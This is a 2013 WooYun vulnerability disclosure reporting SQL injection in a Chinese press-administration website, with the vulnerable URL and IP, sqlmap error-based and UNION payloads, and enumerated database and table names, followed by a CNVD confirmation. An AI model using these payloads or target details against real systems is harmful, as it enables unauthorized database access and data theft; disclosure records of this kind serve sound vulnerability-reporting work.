当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-028688

漏洞标题:中华人民共和国新闻出版总署SQL注入漏洞

相关厂商:中华人民共和国新闻出版总署

漏洞作者: lucky

提交时间:2013-07-13 10:26

修复时间:2013-08-27 10:26

公开时间:2013-08-27 10:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-13: 细节已通知厂商并且等待厂商处理中
2013-07-17: 厂商已经确认,细节仅向厂商公开
2013-07-27: 细节向核心白帽子及相关领域专家公开
2013-08-06: 细节向普通白帽子公开
2013-08-16: 细节向实习白帽子公开
2013-08-27: 细节向公众公开

简要描述:

详细说明:

http://219.141.187.20/display.aspx?ID=10&Type=statute


---
Place: GET
Parameter: ID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ID=10 AND 2859=CONVERT(INT,(CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+(SELECT (CASE WHEN (2859=2859) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58)))&Type=statute
    Type: UNION query
    Title: Generic UNION query (NULL) - 14 columns
    Payload: ID=10 UNION ALL SELECT CHAR(58)+CHAR(107)+CHAR(106)+CHAR(122)+CHAR(58)+CHAR(114)+CHAR(87)+CHAR(98)+CHAR(78)+CHAR(70)+CHAR(102)+CHAR(84)+CHAR(117)+CHAR(73)+CHAR(107)+CHAR(58)+CHAR(109)+CHAR(107)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &Type=statute
---
[03:55:03] [INFO] testing Microsoft SQL Server
[03:55:06] [INFO] confirming Microsoft SQL Server
[03:55:06] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[03:55:06] [INFO] fetching database names
[03:55:09] [INFO] the SQL query used returns 7 entries
[03:55:09] [INFO] retrieved: "CY_Standards"
[03:55:12] [INFO] retrieved: "master"
[03:55:13] [INFO] retrieved: "model"
[03:55:13] [INFO] retrieved: "msdb"
[03:55:13] [INFO] retrieved: "ReportServer"
[03:55:17] [INFO] retrieved: "ReportServerTempDB"
[03:55:20] [INFO] retrieved: "tempdb"
available databases [7]:                                                       
[*] CY_Standards
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: CY_Standards                                                         
[126 tables]
+-------------------------------------------------------+
| dbo.D99_CMD                                           |
| dbo.D99_Tmp                                           |
| dbo.DIY_TEMPCOMMAND_TABLE                             |
| dbo.Documents                                         |
| dbo.DocumentsInfo                                     |
| dbo.Info_FAQ                                          |
| dbo.Roles                                             |
| dbo.TCInfo                                            |
| dbo.VIEW1                                             |
| dbo.ZTB_DeptInfo                                      |
| dbo.ZTB_UserInfo                                      |
| dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436]           |
| dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436_DynamicPA] |
| dbo.[_06dcc84f-118d-4208-a4ea-7fcf5b371436_Version]   |
| dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6]           |
| dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6_DynamicPA] |
| dbo.[_0a180f98-9af3-44ce-96c5-181295ad78c6_Version]   |
| dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07]           |
| dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07_DynamicPA] |
| dbo.[_0a71cd2f-0915-4bd2-838f-f4ff074efd07_Version]   |
| dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd]           |
| dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd_DynamicPA] |
| dbo.[_158e680d-ed47-4e50-9540-58b5c1393ddd_Version]   |
| dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a]           |
| dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a_DynamicPA] |
| dbo.[_17aaaecc-e87d-4f0f-ac35-959b9660046a_Version]   |
| dbo.[_26df551d-a02e-467d-a759-f893b8f014b4]           |
| dbo.[_26df551d-a02e-467d-a759-f893b8f014b4_DynamicPA] |
| dbo.[_26df551d-a02e-467d-a759-f893b8f014b4_Version]   |
| dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd]           |
| dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd_DynamicPA] |
| dbo.[_31bc42b5-9eab-4b3b-99f7-2397abb976fd_Version]   |
| dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d]           |
| dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d_DynamicPA] |
| dbo.[_5056662a-5513-4929-9c8c-43cdfad51c4d_Version]   |
| dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce]           |
| dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce_DynamicPA] |
| dbo.[_7b07eade-a1e7-4d2f-a3eb-20277e4115ce_Version]   |
| dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b]           |
| dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b_DynamicPA] |
| dbo.[_a6a7a594-ce4b-4af6-84a4-eb72a2a58c8b_Version]   |
| dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4]           |
| dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4_DynamicPA] |
| dbo.[_a7ee9495-4033-438c-902d-39dd5ede61f4_Version]   |
| dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b]           |
| dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b_DynamicPA] |
| dbo.[_adb723ef-3198-41c4-bdff-bf92b864258b_Version]   |
| dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7]           |
| dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7_DynamicPA] |
| dbo.[_aeffd70c-d3be-439a-8892-3242d258fde7_Version]   |
| dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867]           |
| dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867_DynamicPA] |
| dbo.[_bfafc861-d0fb-4bdd-b51a-a8df55d0a867_Version]   |
| dbo.[_c276f37f-111a-4971-b496-bdc1d832933d]           |
| dbo.[_c276f37f-111a-4971-b496-bdc1d832933d_DynamicPA] |
| dbo.[_c276f37f-111a-4971-b496-bdc1d832933d_Version]   |
| dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3]           |
| dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3_DynamicPA] |
| dbo.[_c3ec8cd0-d75e-4aee-8316-0655c4a559a3_Version]   |
| dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5]           |
| dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5_DynamicPA] |
| dbo.[_cb50d9ff-93d8-4428-8978-8545e2ee0db5_Version]   |
| dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216]           |
| dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216_DynamicPA] |
| dbo.[_df06b21c-8faa-4fc3-8daf-5ab18989f216_Version]   |
| dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c]           |
| dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c_DynamicPA] |
| dbo.[_e9216f66-0fa8-45b7-bde2-a3de08e3b05c_Version]   |
| dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af]           |
| dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af_DynamicPA] |
| dbo.[_ea5b7a09-0a16-40f7-9d70-ed0a1db517af_Version]   |
| dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8]           |
| dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8_DynamicPA] |
| dbo.[_eb5562e5-3b88-4d02-b9ab-1d0c3e8ccee8_Version]   |
| dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad]           |
| dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad_DynamicPA] |
| dbo.[_f37442a4-57af-4352-b3fd-2a4722b82aad_Version]   |
| dbo._                                                 |
| dbo.__Config                                          |
| dbo.deptInfo                                          |
| dbo.docType                                           |
| dbo.downloadRecords                                   |
| dbo.downloadStandard                                  |
| dbo.dtproperties                                      |
| dbo.dynamicAmend                                      |
| dbo.dynamicAmendIfo                                   |
| dbo.dynamicAmendInfoA                                 |
| dbo.dynamicAmendInfoB                                 |
| dbo.dynamicAmendUserInfo                              |
| dbo.dynamicCode                                       |
| dbo.dynamicCodeIfo                                    |
| dbo.dynamicFields                                     |
| dbo.education                                         |
| dbo.elements                                          |
| dbo.infoRelease                                       |
| dbo.infoType                                          |
| dbo.info_amend                                        |
| dbo.info_bulletin                                     |
| dbo.info_chair                                        |
| dbo.info_feedback                                     |
| dbo.info_feedbackDetails                              |
| dbo.info_knowledge                                    |
| dbo.info_notice                                       |
| dbo.info_statute                                      |
| dbo.mailList                                          |
| dbo.phases                                            |
| dbo.plans                                             |
| dbo.plansAttach                                       |
| dbo.rights                                            |
| dbo.roleRights                                        |
| dbo.standardWatch                                     |
| dbo.standards                                         |
| dbo.standardsClass                                    |
| dbo.standardsClass_Ext                                |
| dbo.standardsFlow                                     |
| dbo.standardsOpnion                                   |
| dbo.standardsOpnionInfo                               |
| dbo.standardsPNum_bak                                 |
| dbo.standardsProc                                     |
| dbo.sysLogs                                           |
| dbo.userInfo                                          |
| dbo.userRolesRelation                                 |
| dbo.vStandards                                        |
| dbo.vStandardsTemp1                                   |
| dbo.vStandardsTemp2                                   |
| dbo.vStandardsTemp3                                   |
+-------------------------------------------------------+


漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-07-17 23:23

厂商回复:

CNVD确认并复现所述情况,拟通过正式函件方式通报网站管理单位。
rank 15

最新状态:

暂无